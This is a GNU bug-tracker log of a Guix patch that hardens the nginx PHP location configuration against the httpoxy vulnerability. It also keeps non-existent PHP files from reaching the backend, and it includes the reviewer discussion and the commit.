GNU bug report logs -
#62678
[PATCH] services: nginx: Harden php-location settings.
Previous Next
Reported by: Bruno Victal <mirai <at> makinata.eu>
Date: Wed, 5 Apr 2023 15:35:02 UTC
Severity: normal
Tags: patch, security
Done: Tobias Geerinckx-Rice <me <at> tobias.gr>
Bug is archived. No further changes may be made.
To add a comment to this bug, you must first unarchive it, by sending
a message to control AT debbugs.gnu.org, with unarchive 62678 in the body.
You can then email your comments to 62678 AT debbugs.gnu.org in the normal way.
Toggle the display of automated, internal messages from the tracker.
Report forwarded
to
guix-patches <at> gnu.org:
bug#62678; Package
guix-patches.
(Wed, 05 Apr 2023 15:35:02 GMT)
Full text and
rfc822 format available.
Acknowledgement sent
to
Bruno Victal <mirai <at> makinata.eu>:
New bug report received and forwarded. Copy sent to
guix-patches <at> gnu.org.
(Wed, 05 Apr 2023 15:35:02 GMT)
Full text and
rfc822 format available.
Message #5 received at submit <at> debbugs.gnu.org (full text, mbox):
Incorporate advice from [2], which mitigates httpoxy[1] vulnerability and
disallows passing non-php files to the PHP backend.
[1]: <https://httpoxy.org/>
[2]: <https://www.nginx.com/resources/wiki/start/topics/examples/phpfcgi/>,
note 4.
* gnu/services/web.scm (nginx-php-location): Only pass existing php files to
backend. Mitigate httpoxy vulnerability.
---
Tested with: make check-system TESTS="nginx php-fpm"
gnu/services/web.scm | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/gnu/services/web.scm b/gnu/services/web.scm
index d56e893527..f5ed027bb4 100644
--- a/gnu/services/web.scm
+++ b/gnu/services/web.scm
@@ -1123,6 +1123,10 @@ (define* (nginx-php-location
(uri "~ \\.php$")
(body (list
"fastcgi_split_path_info ^(.+\\.php)(/.+)$;"
+ ;; Mitigate https://httpoxy.org/ vulnerabilities
+ "fastcgi_param HTTP_PROXY \"\";"
+ ;; Only pass existing php files to the backend.
+ "if (!-f $document_root$fastcgi_script_name) { return 404; }"
(string-append "fastcgi_pass unix:" socket ";")
"fastcgi_index index.php;"
(list "include " nginx-package "/share/nginx/conf/fastcgi.conf;")))))
base-commit: 6311493d7a6271bfbc51f4693857f9a12fe9965d
--
2.39.2
Information forwarded
to
guix-patches <at> gnu.org:
bug#62678; Package
guix-patches.
(Wed, 05 Apr 2023 20:21:02 GMT)
Full text and
rfc822 format available.
Message #8 received at 62678 <at> debbugs.gnu.org (full text, mbox):
I wonder if we should at least make the HTTP_PROXY variable
configurable. It may need to be set to something else then "" in some
scenarios. I don't know...
Information forwarded
to
guix-patches <at> gnu.org:
bug#62678; Package
guix-patches.
(Thu, 06 Apr 2023 13:12:01 GMT)
Full text and
rfc822 format available.
Message #11 received at 62678 <at> debbugs.gnu.org (full text, mbox):
Hi Jonathan,
On 2023-04-05 21:19, Jonathan Brielmaier wrote:
> I wonder if we should at least make the HTTP_PROXY variable
> configurable. It may need to be set to something else then "" in some
> scenarios. I don't know...
No, there's no legitimate reason for this, since 'PROXY' is not
a standard HTTP header according to [1]. PROXY being passed to a cgi application
as HTTP_PROXY is what the exploit is about, since HTTP_PROXY is recognized as
a variable for configuring proxies (for curl, wget, etc.)
Allowing HTTP_PROXY to be set remotely (due to a confusion with the non-standard 'PROXY' header)
is simply incomprehensible.
Regarding user intent, that is, configuring the proxy used by the cgi application by
setting HTTP_PROXY via nginx?
I don't have this use-case but IMO it feels like an extreme poor design, since it's
exploiting a name confusion to change the system environment variables for the
cgi application.
If for some reason you really need this, you can always use the regular
nginx-location-configuration to manually craft a php-location.
[1]: https://www.iana.org/assignments/http-fields/http-fields.xhtml
Cheers,
Bruno
Added tag(s) security.
Request was from
Bruno Victal <mirai <at> makinata.eu>
to
control <at> debbugs.gnu.org.
(Thu, 22 Jun 2023 13:34:02 GMT)
Full text and
rfc822 format available.
Reply sent
to
Tobias Geerinckx-Rice <me <at> tobias.gr>:
You have taken responsibility.
(Fri, 07 Jul 2023 14:23:02 GMT)
Full text and
rfc822 format available.
Notification sent
to
Bruno Victal <mirai <at> makinata.eu>:
bug acknowledged by developer.
(Fri, 07 Jul 2023 14:23:02 GMT)
Full text and
rfc822 format available.
Message #18 received at 62678-done <at> debbugs.gnu.org (full text, mbox):
[Message part 1 (text/plain, inline)]
Hi Bruno,
Bruno Victal 写道:
> Incorporate advice from [2], which mitigates httpoxy[1]
> vulnerability and
> disallows passing non-php files to the PHP backend.
>
> [1]: <https://httpoxy.org/>
> [2]:
> <https://www.nginx.com/resources/wiki/start/topics/examples/phpfcgi/>,
> note 4.
This is a better comment than commit message. I made it so and
pushed your changes as commit
cbc14b3baea457cf2718b85f767d39ff3911ce91.
Thanks!
T G-R
[signature.asc (application/pgp-signature, inline)]
bug archived.
Request was from
Debbugs Internal Request <help-debbugs <at> gnu.org>
to
internal_control <at> debbugs.gnu.org.
(Sat, 05 Aug 2023 11:24:08 GMT)
Full text and
rfc822 format available.
This bug report was last modified 1 year and 279 days ago.
Previous Next
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson.